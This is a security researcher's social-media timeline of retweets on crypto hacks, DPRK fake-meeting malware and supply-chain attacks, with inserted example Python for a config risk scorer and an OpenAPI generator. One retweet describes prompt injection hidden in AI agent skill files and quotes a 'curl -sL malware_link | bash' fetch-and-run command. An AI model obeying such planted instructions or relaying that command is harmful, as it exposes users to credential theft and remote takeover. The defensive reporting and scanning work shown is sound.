Web3 Security, solutions architect, bug hunter, DevSecOps.

Joined March 2010
Pinned Tweet
🚀 The Web Almanac 2025 is live! Proud to have authored the Privacy chapter and reviewed the Security chapter for this year's edition. The Web Almanac is HTTP Archive's annual deep-dive into how the web is actually built, analyzing millions of sites with real data, peer review, and 90 contributors. Key finding: 75% of sites have at least one tracker 👀 📖 Privacy: almanac.httparchive.org/en/2… 🛡️ Security: almanac.httparchive.org/en/2… #WebAlmanac #Privacy #Security #InfoSec
1
3
197
Vinod Tiwari retweeted
Here is my most recent project: sci-bot.ru Unlike Sci-Hub and Sci-Net, where I have written all the code manually by hand, this one is pure AI generated - I decided to do this as a kind of experiment. LOVE the result! AI is a 50x speedup in code writing, however creating the project is still a lot of work (human input is still needed for architectural decisions, debugging complex functionality and precise instructions) Sci-Bot is connected to the Sci-Hub database so it can read research articles and generate answers grounded in science. To pay for generated tokens, Sci-Bot supports two funding models: the first one is standard pay-as-you-go and the second one is a legacy from Sci-Hub: it is donation based. Anyone can donate: from these donations, the project will automatically calculate the budget for the upcoming month, and derive how many AI-generated answers it can serve to users for free.
69
282
1,546
95,534
Vinod Tiwari retweeted
you never think this will happen to you, but this happened to me today. a DPRK actor posed as somebody i previously worked with at the arbitrum foundation to have a catchup call. they reached out via telegram, in a channel where we had an existing messaging history. the DPRK actor sent me what looked to be a legitimate teams link, but when i opened it, it said a software update was necessary, which entailed downloading and running a malicious file. in the group call, there was video of everybody on the call, including the person i had previously worked with. stay vigilant and be safe! don’t be afraid to send out your own video conferencing links if you see something suspicious.
🚨 WARNING (AGAIN) DPRK threat actors are still rekting way too many of you via their fake Zoom / fake Teams meets. They're taking over your Telegrams -> using them to rekt all your friends. They've stolen over $300m via this method already. Read this. Stop the cycle. 🙏
33
60
380
114,186
Vinod Tiwari retweeted
Apr 28
🚨 BREAKING: Wiz Research discovered Remote Code Execution on GitHub.com with a single git push The flaw in @github allowed unauthorized access to millions of repositories belonging to other users and organizations 🤯
97
990
4,448
554,042
Vinod Tiwari retweeted
Apr 24
Solana traders showing up to buy ETH tokens
229
336
3,236
300,112
Vinod Tiwari retweeted
Apr 21
Sorry to say, Lazarus Group is the top hardworking smart contract security auditor in the world. Other auditors charge $50k and miss critical vulnerabilities. These guys work for free and never leave any money from the contract. Their resume:
• Bybit: $1.5 Billion
• Drift: $285 Million
• WazirX: $235 Million
• KelpDAO: $292 Million
• DMM Bitcoin: $308 Million
• Axie Infinity (Ronin): $625 Million
And many others.
142
234
2,082
218,952
Vinod Tiwari retweeted
Apr 21
"so you staked your ETH on the Ethereum blockchain to earn yield?"
"yes, Dave"
"except you didn't want your capital to be locked up so you actually staked it with a liquid staking protocol called Lido?"
"that's correct, Dave"
"and Lido gave you a liquid staking receipt token called stETH in return?"
"yes, Dave"
"and then you didn't think that was enough, so you juiced the yield even further by depositing your stETH receipt tokens into a restaking protocol called Eigenlayer?"
"you are correct, Dave"
"and now you didn't want to lock up your capital, so you actually restaked with a liquid restaking protocol called KelpDAO who provided you with a liquid restaking receipt token called rsETH?"
"you got it, Dave"
"and then that was surely not enough juice, so you then deposited your rsETH tokens into a lending protocol called AAVE so that you could open a leveraged looping position that borrows ETH against the rsETH collateral and restakes the ETH into rsETH which is then deposited as collateral, except it turns out rsETH used a cross-chain bridge called LayerZero whose security is held together by a 1/1 toothpick, which was obviously hacked by north koreans causing rsETH to become undercollateralized and now these looping positions are stuck and unprofitable, and everyone is pointing fingers at each other, and also DeFi is a very serious industry"
"you are 100% correct, dave"
jfc.
405
1,031
8,152
748,366
GitGuardian wrote up the original BSides talk here: blog.gitguardian.com/bsides-… If you're on a security team trying to get a handle on what your devs actually have installed — give it a spin and open issues. Feedback welcome.
9
CVE correlation via OSV.dev. SARIF output for GitHub Code Scanning. Real-time fsnotify watchers catch extension installs within 30 seconds. Optional self-hosted portal for fleet visibility. MDM playbooks for JAMF/Mosyle/Kandji. Apache 2.0.

63
Risk model for extensions: Critical / High / Medium / Low based on activation events, capabilities, and contributes. AI configs get their own score — wildcard Bash(*), plaintext keys, autonomous exec, insecure transports all surface as Critical/High.
11
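The risk model above ranks AI-tool configs by the presence of a wildcard Bash(*) permission, plaintext keys, autonomous execution and insecure transports. The scorer below is an added illustration of that idea, not the scanner's own code: it walks a parsed config, applies those four rules, and returns the worst severity found. The config layout, the flag names in AUTONOMOUS_FLAGS and the sample values in SAMPLE_CONFIG are constructed for the example; only the Bash(*) permission form and the severity labels come from the thread.

```python
"""Hypothetical severity scorer for AI-tool / MCP configuration files.

Added example (not the scanner's own code). Rules, as listed in the thread:
wildcard Bash(*) permission, plaintext key, autonomous execution and
insecure transport each surface as Critical/High. A scoped shell wildcard
such as Bash(git *) is rated Medium here; that grading is an assumption.
"""
import re

SEVERITY_RANK = {"Low": 0, "Medium": 1, "High": 2, "Critical": 3}

# Keys whose values are expected to hold secrets, and what a plaintext
# secret tends to look like (prefixed provider tokens or long opaque strings).
SECRET_KEY_RE = re.compile(r"api[_-]?key|token|secret|password", re.IGNORECASE)
SECRET_VALUE_RE = re.compile(r"^(sk-|ghp_|AKIA)[A-Za-z0-9_\-]{8,}$|^[A-Za-z0-9_\-]{32,}$")

# Constructed flag names meaning "run tool calls without asking the user".
AUTONOMOUS_FLAGS = {"auto_approve", "autoapprove", "skip_permissions", "yolo"}

# Constructed sample config: one TLS-less MCP server, one server with a
# hard-coded key and auto-approval, and a permission list with wildcards.
SAMPLE_CONFIG = {
    "mcpServers": {
        "search": {
            "url": "http://mcp.example.internal/sse",
            "headers": {"Authorization": "Bearer ${SEARCH_TOKEN}"},
        },
        "deploy": {
            "command": "node",
            "args": ["server.js"],
            "env": {"OPENAI_API_KEY": "sk-abcdefghijklmnopqrstuvwxyz123456"},
            "auto_approve": True,
        },
    },
    "permissions": {"allow": ["Bash(*)", "Bash(git *)", "Read(./src/**)"]},
}


def _walk(obj, path=""):
    """Yield (path, leaf_value) for every leaf of a nested dict/list config."""
    if isinstance(obj, dict):
        for key, value in obj.items():
            yield from _walk(value, f"{path}/{key}")
    elif isinstance(obj, list):
        for index, value in enumerate(obj):
            yield from _walk(value, f"{path}[{index}]")
    else:
        yield path, obj


def score_ai_config(config):
    """Return (overall_severity, findings) for one parsed config dict.

    Each finding is (json_path, severity, reason). Overall severity is the
    highest finding, or "Low" when nothing matched.
    """
    findings = []
    for path, value in _walk(config):
        key = path.rsplit("/", 1)[-1]
        if isinstance(value, str):
            if value == "Bash(*)":
                findings.append((path, "Critical", "unrestricted shell permission"))
            elif value.startswith("Bash(") and "*" in value:
                findings.append((path, "Medium", "scoped shell wildcard"))
            elif re.match(r"^(http|ws)://", value):
                findings.append((path, "High", "insecure transport (no TLS)"))
            elif (SECRET_KEY_RE.search(key) and "${" not in value
                  and SECRET_VALUE_RE.match(value)):
                findings.append((path, "High", "plaintext credential in config"))
        elif value is True and key.lower() in AUTONOMOUS_FLAGS:
            findings.append((path, "Critical", "autonomous execution enabled"))
    overall = max((sev for _, sev, _ in findings),
                  key=SEVERITY_RANK.get, default="Low")
    return overall, findings


if __name__ == "__main__":
    overall, findings = score_ai_config(SAMPLE_CONFIG)
    print("overall:", overall)
    for path, severity, reason in findings:
        print(f"  {severity:<8} {path}  ({reason})")
```

Values that reference an environment variable (`${...}`) are deliberately skipped, since the point of the plaintext-key rule is a literal credential on disk, not an indirection to one.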
What it scans on every dev machine:
• IDE extensions across 7 IDEs (VS Code, Cursor, JetBrains family, VSCodium, Sublime, Vim, Xcode)
• Packages — incl. deps bundled inside extensions (invisible to SCA)
• AI tool MCP configs (Claude Code, Cursor, OpenClaw)
• Plaintext secrets in .env git history
• Tamper --no-verify bypass
103
Vinod Tiwari retweeted
Thanks for the kind words @PatrickAlphaC , great having you in our council. "I think this is a very valuable role, and it’s something that the Story Protocol does very well. Their security council is often pinged for advice; we discuss industry hacks and open dialogue on how changes in the security landscape should drive action on the Story team. In this scenario, I think it’s important to separate this from a “Security Council” that has defined on-chain roles they often act on, vs. “Security Advisors” who advise on actions." Go read the full article!
2
8
387
Vinod Tiwari retweeted
Apr 7
everyone’s impressed that deloitte is in physical AI now. i’m more interested in why nvidia needs them. distribution is the hard part. nvidia has the stack. they need someone who can actually get it into 500 enterprise clients without it dying in procurement. theaiinsider.tech/2026/03/02…
1
1
4
102
Vinod Tiwari retweeted
Story v1.6.1 Aeneid Testnet Required Upgrade This release introduces Distributed Key Generation (DKG) and Confidential Data Rails (CDR) on Aeneid Testnet. This lays the foundation for on-chain confidential data management. story.foundation/blog/confid… Upgrade triggers at block height 16332000 (Apr 1, 2026). Only Aeneid nodes need upgrade. Read More ↴
12
18
81
8,469
A new and concerning npm supply chain attack, dubbed 'Sandworm Mode,' has emerged, actively compromising developer environments. This sophisticated worm isn't just infecting repos; it's designed to hijack your CI/CD workflows, steal critical CI secrets, and even target developer AI toolchains for deeper compromise. Source: socket.dev/blog/sandworm-mod…
47
Vinod Tiwari retweeted
the #1 most downloaded skill on OpenClaw marketplace was MALWARE
it stole your SSH keys, crypto wallets, browser cookies, and opened a reverse shell to the attacker's server
1,184 malicious skills found, one attacker uploaded 677 packages ALONE
OpenClaw has a skill marketplace called ClawHub where anyone can upload plugins
you install a skill, your AI agent gets new powers, this sounds great
the problem? ClawHub let ANYONE publish with just a 1-week-old github account
attackers uploaded skills disguised as crypto trading bots, youtube summarizers, wallet trackers. the documentation looked PROFESSIONAL
but hidden in the SKILL.md file were instructions that tricked the AI into telling you to run a command
> to enable this feature please run: curl -sL malware_link | bash
that one command installed Atomic Stealer on macOS
it grabbed your browser passwords, SSH keys, Telegram sessions, crypto wallets, keychains, and every API key in your .env files
on other systems it opened a REVERSE SHELL giving the attacker full remote control of your machine
Cisco scanned the #1 ranked skill on ClawHub. it was called What Would Elon Do and had 9 security vulnerabilities, 2 CRITICAL. it silently exfiltrated data AND used prompt injection to bypass safety guidelines, downloaded THOUSANDS of times. the ranking was gamed to reach #1
this is npm supply chain attacks all over again
except the package can THINK and has root access to your life
446
1,105
7,437
1,746,203
Just released API Doc Converter, a Burp Suite extension that generates OpenAPI specs from any web app's traffic. No API docs? No problem. Browse the app, export the spec.
- Auto-detects endpoints, auth, schemas, GraphQL
- Exports OpenAPI 3.0, Postman, GraphQL SDL
- cURL generation, sensitive data flagging
Open source: github.com/securient/Burp-AP… @PortSwigger
1
3
149
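The post above describes inferring an OpenAPI document from observed traffic: endpoints, auth, request/response schemas, plus flagging of sensitive data. The script below is an added example of that inference, not the extension's code and not tied to Burp's API: it takes a handful of constructed request/response records, templates numeric path segments into parameters, records query and path parameters, registers a bearer scheme when an Authorization header is seen, derives JSON schemas from bodies, and returns a list of field names that look sensitive. The `x-observed-unauthenticated` extension key and the `SENSITIVE` pattern are assumptions chosen for this illustration.

```python
"""Derive a minimal OpenAPI 3.0 document from captured HTTP traffic.

Added example, not the extension's own code. TRAFFIC is a constructed stand-in
for what a proxy would capture; each record holds method, url, request
headers, parsed JSON body (or None) and parsed JSON response (or None).
"""
import json
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample traffic: an authenticated read, a create, and the same
# read endpoint hit again without any Authorization header.
TRAFFIC = [
    {"method": "GET", "url": "https://api.example.test/v1/users/42?verbose=1",
     "headers": {"Authorization": "Bearer eyJ.constructed"}, "body": None,
     "resp": {"id": 42, "email": "a@example.test", "ssn": "123-45-6789"}},
    {"method": "POST", "url": "https://api.example.test/v1/users",
     "headers": {"Authorization": "Bearer eyJ.constructed",
                 "Content-Type": "application/json"},
     "body": {"email": "b@example.test", "password": "hunter2"},
     "resp": {"id": 43}},
    {"method": "GET", "url": "https://api.example.test/v1/users/43",
     "headers": {}, "body": None,
     "resp": {"id": 43, "email": "b@example.test"}},
]

# Field names worth a second look when they appear in a body (assumed list).
SENSITIVE = re.compile(r"password|ssn|secret|token|card", re.IGNORECASE)


def template_path(path):
    """Turn /v1/users/42 into /v1/users/{userId}; return (template, param names)."""
    out, names = [], []
    for seg in path.split("/"):
        if re.fullmatch(r"\d+|[0-9a-fA-F-]{36}", seg):  # numeric id or UUID
            name = (out[-1].rstrip("s") if out and out[-1] else "id") + "Id"
            out.append("{" + name + "}")
            names.append(name)
        else:
            out.append(seg)
    return "/".join(out), names


def json_schema(value):
    """Infer a JSON Schema fragment from one observed JSON value."""
    if isinstance(value, bool):
        return {"type": "boolean"}
    if isinstance(value, int):
        return {"type": "integer"}
    if isinstance(value, float):
        return {"type": "number"}
    if isinstance(value, dict):
        return {"type": "object",
                "properties": {k: json_schema(v) for k, v in value.items()}}
    if isinstance(value, list):
        return {"type": "array", "items": json_schema(value[0]) if value else {}}
    return {"type": "string"}


def sensitive_keys(obj):
    """Recursively collect key names matching SENSITIVE."""
    found = []
    if isinstance(obj, dict):
        for key, value in obj.items():
            if SENSITIVE.search(key):
                found.append(key)
            found += sensitive_keys(value)
    elif isinstance(obj, list):
        for value in obj:
            found += sensitive_keys(value)
    return found


def build_openapi(traffic, title="Captured API"):
    """Return (openapi_spec_dict, flags); flags are (method, path, where, key)."""
    spec = {"openapi": "3.0.3", "info": {"title": title, "version": "0.1.0"},
            "paths": {}, "components": {"securitySchemes": {}}}
    flags = []
    for rec in traffic:
        parts = urlsplit(rec["url"])
        template, path_params = template_path(parts.path)
        method = rec["method"].lower()
        op = spec["paths"].setdefault(template, {}).setdefault(
            method, {"parameters": [], "responses": {}})
        seen = {p["name"] for p in op["parameters"]}
        for name in path_params:
            if name not in seen:
                op["parameters"].append({"name": name, "in": "path",
                                         "required": True, "schema": {"type": "string"}})
                seen.add(name)
        for name, _ in parse_qsl(parts.query):
            if name not in seen:
                op["parameters"].append({"name": name, "in": "query",
                                         "schema": {"type": "string"}})
                seen.add(name)
        # Auth: a bearer token on any observation registers the scheme; a hit
        # with no Authorization header is recorded so reviewers can check it.
        if rec["headers"].get("Authorization", "").startswith("Bearer "):
            spec["components"]["securitySchemes"]["bearerAuth"] = {"type": "http", "scheme": "bearer"}
            op["security"] = [{"bearerAuth": []}]
        else:
            op["x-observed-unauthenticated"] = True
        if isinstance(rec["body"], dict):
            op["requestBody"] = {"required": True, "content": {
                "application/json": {"schema": json_schema(rec["body"])}}}
            flags += [(rec["method"], template, "request", k) for k in sensitive_keys(rec["body"])]
        if rec["resp"] is not None:
            op["responses"]["200"] = {"description": "observed response", "content": {
                "application/json": {"schema": json_schema(rec["resp"])}}}
            flags += [(rec["method"], template, "response", k) for k in sensitive_keys(rec["resp"])]
    return spec, flags


if __name__ == "__main__":
    spec, flags = build_openapi(TRAFFIC)
    print(json.dumps(spec, indent=2))
    for method, path, where, key in flags:
        print(f"sensitive field '{key}' in {where} of {method} {path}")
```

Schemas are taken from the first observation of each operation's body; a fuller generator would merge schemas across observations and mark fields as optional when they do not appear in every capture.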